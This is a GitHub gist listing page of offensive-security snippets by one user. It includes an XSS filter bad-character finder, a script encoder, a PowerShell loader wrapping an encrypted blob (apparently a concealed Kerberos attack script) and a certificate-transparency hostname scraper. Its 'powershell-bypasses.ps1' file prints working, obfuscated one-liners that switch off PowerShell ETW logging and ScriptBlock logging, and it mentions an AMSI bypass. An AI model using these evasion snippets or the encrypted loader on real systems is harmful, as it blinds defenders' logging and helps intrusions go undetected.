Skip to content

Instantly share code, notes, and snippets.

Avatar

reigningshells

View GitHub Profile
@reigningshells
reigningshells / badchars.py
Created May 24, 2019
Simple script to identify an XSS filters "bad characters"
View badchars.py
#!/usr/bin/env python
"""
Very simple script to automate the discovery of
bad characters in XSS filters that replace
the entire user input string with an empty string
[CR] = Carriage Return or \r
[LF] = Line Feed or \n
@reigningshells
reigningshells / script-encoder.ps1
Last active Jan 30, 2020
Just some script encoding musings
View script-encoder.ps1
Function Encode-Script
{
Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$Data,
[Parameter(Position = 1, Mandatory = $True)]
[String]
$Key
View cryptedkerb.ps1
function Expand-Script($Key)
{
$script = 'aYBcG3Uj0ZnntfLj7RcOGoI2DF7qsMjyiUl8sSgzNuiasymplD/6TedvjCI9NxVWeKoPGahMzCTi7XaBc1qUKQc0sFHiel6Ws4MnXSyd5KOXrTaA6DguIDDJAFypuittSp5ENc6A3SUZUHMB+dDHDwycN6cY6Olq7qB8c5Q2CiTdaieiwp7VbSCAgzJxD4QLQWlxqXDcaJ0caqnaPvUDgJUdgDvO9Ts6JBankNuMTaUsb02+ocZBz/7acSatXFLBQqi+1mAiIBDrCSoMYcFCswS0A9XNN5z/n1Z/ver8Qy53jJDBUrhwI79/4oKtdohzEbSyYtHs6JQKaanPGhtqlAZxiq1Y3IWFzt6xytNx6ULsKIASIo0CQ08dx5ECYZFpulo+LC+NrQxYzNigqkrgdHT01rEQr4EUFslvEknLEDOal9SRX2IfWTvKe64uUbWZmSmqLyOBajlEjvflEog5jKLVTXLY2fpzPVuJQANM8r5TcfO2GS7Sit2sb2cv8yZqWixypQtwqRgAjeDHuhtdKVk3cvfOyS7XoUzyv880DiTr1k5RAX0vxbqStjz41HP4FitJCHjfK4w4QljnllCAjU9n2bvqqQ3t2TMdFH2WTLs//cN1ci3gT3YKLo2UI/PUuZtYfv3pPRwtF+0aZncjAEFB413kUuDyotzFXqcfo0M/kq44LXsi1j7/YvmcJ9q6YfpcDxFmJ4+2wdk28iSMIOz9d303s2FU9K740jcM5ftdCD8/+vAT8lRg7zfUGZ5AHgb7864408gGgI4+xZKGK4FR+0RdAd7zs7D+yeIfWdkmYrcJ72+y7guk0Od+lFHrxQRWQLZ7MDjpjD1+qIu+O4YuSiUtDYLAix0iT3G8o3Kqq9lwZ3P9j42hwoNjrXI0TPY42OTGqZDRPUJl+V4bMy+0GTJ2Vq/+peNI4qjBPH0XPMU4+S1gizFPSPXKz/S4upC3yhP6fie6UVBPZAk
@reigningshells
reigningshells / cert-transparency-extractor.py
Last active Jul 20, 2020
Simple script to extract hostnames from cert transparency logs at crt.sh
View cert-transparency-extractor.py
#!/usr/bin/env python3
import sys
import argparse
import requests
from lxml import html
import urllib3
# Nobody wants to see SSL warnings :-P
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
@reigningshells
reigningshells / powershell-bypasses.ps1
Last active Aug 18, 2020
Random PowerShell Bypasses
View powershell-bypasses.ps1
# Best logging bypass:
(({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid)))
# ScriptBlock Warning Event Logging Bypass:
[ScriptBlock]."GetFiel`d"('signatures','N'+'onPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]))
# AMSI Bypass (old, burned)
You can’t perform that action at this time.